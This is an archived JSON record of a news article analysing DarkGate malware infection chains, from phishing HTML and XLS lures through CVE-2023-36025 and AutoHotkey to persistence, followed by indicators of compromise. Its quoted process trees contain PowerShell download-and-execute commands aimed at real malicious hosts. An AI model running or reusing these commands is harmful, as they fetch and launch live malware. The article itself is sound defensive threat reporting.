{
	"id": "d5344dee-15b4-4a79-9719-eac0c590d037",
	"created_at": "2026-04-06T00:07:04.775023Z",
	"updated_at": "2026-04-10T13:12:11.036561Z",
	"deleted_at": null,
	"sha1_hash": "c1517951f81bf521c0c42500610ff9b7b10957c9",
	"title": "Darkgate Malware Leveraging Autohotkey Following Teams",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 484144,
	"plain_text": "Darkgate Malware Leveraging Autohotkey Following Teams\r\nBy Divya\r\nPublished: 2024-04-30 · Archived: 2026-04-05 22:29:33 UTC\r\nResearchers have uncovered a novel infection chain associated with the DarkGate malware.\r\nThis Remote Access Trojan (RAT), developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018.\r\nThe DarkGate malware boasts an array of functionalities, including process injection, file download and\r\nexecution, data theft, shell command execution, and keylogging capabilities.\r\nThe researchers have observed a concerning increase in the spread of DarkGate over the past three months, with a\r\nsignificant global presence, as depicted in the following figure:\r\nGeo-Distribution of DarkGate\r\nGeo-Distribution of DarkGate\r\nBypassing Microsoft Defender SmartScreen\r\nOne of the key findings of the investigation is that the DarkGate malware can circumvent detection by Microsoft\r\nDefender SmartScreen.\r\nThis evasion tactic prompted Microsoft to release a patch to address the underlying vulnerability, CVE-2023-\r\n36025, which had been identified and patched in the previous year.\r\nThe vulnerability arose from the absence of proper checks and corresponding prompts related to Internet Shortcut\r\n(.url) files.\r\nCyber adversaries exploited this flaw by creating malicious .url files capable of downloading and executing\r\nharmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen,\r\nas per a report by McAfee.\r\nIs Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach -Download Free Guide\r\nSimilarly, this year, the researchers have identified another vulnerability, CVE-2024-21412, which also allowed\r\nfor the bypass of the security feature in Internet Shortcut Files.\r\nMicrosoft has since released a patch to address this issue.\r\nInfection Chains Unveiled\r\nThe researchers have identified two distinct initial vectors carrying identical DarkGate shellcode and payload.\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 1 of 6\n\nInfection Chain\r\n Infection Chain\r\nThe first vector originates from an HTML file, while the second begins with an XLS file.\r\nLet’s delve into each chain individually to unveil their respective mechanisms.\r\nInfection from HTML\r\nThe infection chain initiates with a phishing HTML page masquerading as a Word document.\r\nUsers are prompted to open the document in “Cloud View,” creating a deceptive lure for unwitting individuals to\r\ninteract with malicious content.\r\nHTML page\r\nHTML page\r\nUpon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the\r\nsubsequent redirection process.\r\nPrompt confirming redirection to Windows Explorer\r\nPrompt confirming redirection to Windows Explorer\r\nThe researchers discovered that the HTML file contained a JavaScript function designed to reverse strings,\r\nsuggesting an attempt to decode or manipulate encoded data.\r\nUpon further investigation, they found that the highlighted content in the image was a string encoded in reverse\r\nBase64 format.\r\nJavascript in HTML code\r\nJavascript in HTML code\r\nDecoding the content revealed a URL that utilized the “search-ms” application protocol to execute a search\r\noperation for a file named “Report-26-2024.url”.\r\nThe “crumb” parameter was employed to confine the search within the context of the malicious WebDAV share,\r\nrestricting its scope.\r\nWebDAV share\r\nWebDAV share\r\nThe .url file contained a URL parameter that pointed to a VBScript file, which would be automatically executed\r\nupon the .url file’s execution.\r\nThis process allowed for executing malicious commands or actions on the system, exploiting the CVE-2023-\r\n36025 vulnerability.\r\nContent of.URL file\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 2 of 6\n\nContent of.URL file\r\nThe researchers observed that the VBScript file would execute a PowerShell command to fetch a script from a\r\nremote location and execute it.\r\nIntegrate ANY.RUN in Your Company for Effective Malware Analysis\r\nAre you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000\r\nindependent security researchers:\r\nReal-time Detection\r\nInteractive Malware Analysis\r\nEasy to Learn by New Security Team members\r\nGet detailed reports with maximum data\r\nSet Up Virtual Machine in Linux \u0026 all Windows OS Versions\r\nInteract with Malware Safely\r\nIf you want to test all these features now with completely free access to the sandbox:\r\nThis script would then proceed to download and execute the AutoHotkey utility, along with a malicious script,\r\nultimately leading to the execution of the DarkGate payload.\r\nProcess tree\r\nProcess tree\r\nFollowing are the command lines:\r\n“C:\\Windows\\System32\\WScript.exe”\r\n“C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs”\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -Command Invoke-Expression\r\n(Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)\r\n\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\r\n“C:\\rjtu\\AutoHotkey.exe” C:/rjtu/script.ahk\r\n“C:\\Windows\\system32\\attrib.exe” +h C:/rjtu/\r\nInfection from XLS\r\nThe second infection vector originates from a malicious Excel (XLS) file.\r\nWhen the user clicks the “Open” button, a warning prompt appears before the file is opened.\r\nXLS sample\r\nXLS sample\r\nUpon allowing the activity, the researchers observed a similar process tree to the HTML-based infection chain,\r\nwith the Excel file executing a VBScript file downloaded from a remote location.\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 3 of 6\n\nProcess tree from Excel file\r\nProcess tree from Excel file\r\nThe command lines are:\r\n“C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE” “C:\\Users\\admin\\Documents\\Cluster\\10-\r\napr-xls\\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”\r\n“C:\\Windows\\System32\\WScript.exe”\r\n“\\\\45.89.53.187\\s\\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)\r\n\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\r\n“C:\\kady\\AutoHotkey.exe” C:/kady/script.ahk\r\n“C:\\Windows\\system32\\attrib.exe” +h C:/kady/\r\nThe remote script downloaded and executed the same set of files, including the AutoHotkey utility and a\r\nmalicious script, ultimately executing the DarkGate payload.\r\nRemote script similar to previous chain\r\nRemote script similar to the previous chain\r\nPersistence and Exfiltration\r\nTo maintain persistence, the malware drops a .lnk file in the startup folder, which in turn drops a folder named\r\n“hakeede” in the “C:\\ProgramData” directory.\r\nThis folder contains the same set of files, including the AutoHotkey script, executed to run the DarkGate payload.\r\nPersistence\r\nPersistence\r\nThe researchers also identified data exfiltration to the IP address 5.252.177.207, as shown in the network\r\ncommunication analysis.\r\nNetwork Communication\r\nNetwork Communication\r\nIP address\r\nIP address\r\nThe DarkGate malware’s sophisticated infection chain, leveraging vulnerabilities in Microsoft Defender\r\nSmartScreen and the AutoHotkey utility, highlights the evolving tactics employed by cybercriminals.\r\nThe researchers’ findings underscore the importance of keeping systems up-to-date with the latest security patches\r\nand maintaining vigilance against emerging threats.\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 4 of 6\n\nAs the cybersecurity landscape evolves, individuals and organizations must remain informed and proactive in their\r\ndefense strategies.\r\nBy understanding the techniques malware use, like DarkGate, security professionals can develop more effective\r\ncountermeasures and better protect against such complex and persistent threats.\r\nIndicators of Compromise (IoCs):\r\nFile Hash\r\nHtml file 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005\r\nURL file 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833\r\nVBS 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907\r\nautohotkey.exe 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb\r\nAHK script dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455\r\ntest.txt 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795\r\nDarkGate exe 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031\r\nIP 5.252.177.207\r\nXLS file 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4\r\nVBS 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f\r\nLNK file 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e\r\nIP 103.124.106.237\r\nCombat Email Threats with Easy-to-Launch Phishing Simulations: Email Security AwarenessTraining -\r\n\u003eTry Free Demo\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 5 of 6\n\nDivya\r\nDivya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other\r\nhappenings in the cyber world.\r\nSource: https://gbhackers.com/darkgate-malware-leveraging/\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gbhackers.com/darkgate-malware-leveraging/"
	],
	"report_names": [
		"darkgate-malware-leveraging"
	],
	"threat_actors": [],
	"ts_created_at": 1775434024,
	"ts_updated_at": 1775826731,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c1517951f81bf521c0c42500610ff9b7b10957c9.pdf",
		"text": "https://archive.orkl.eu/c1517951f81bf521c0c42500610ff9b7b10957c9.txt",
		"img": "https://archive.orkl.eu/c1517951f81bf521c0c42500610ff9b7b10957c9.jpg"
	}
}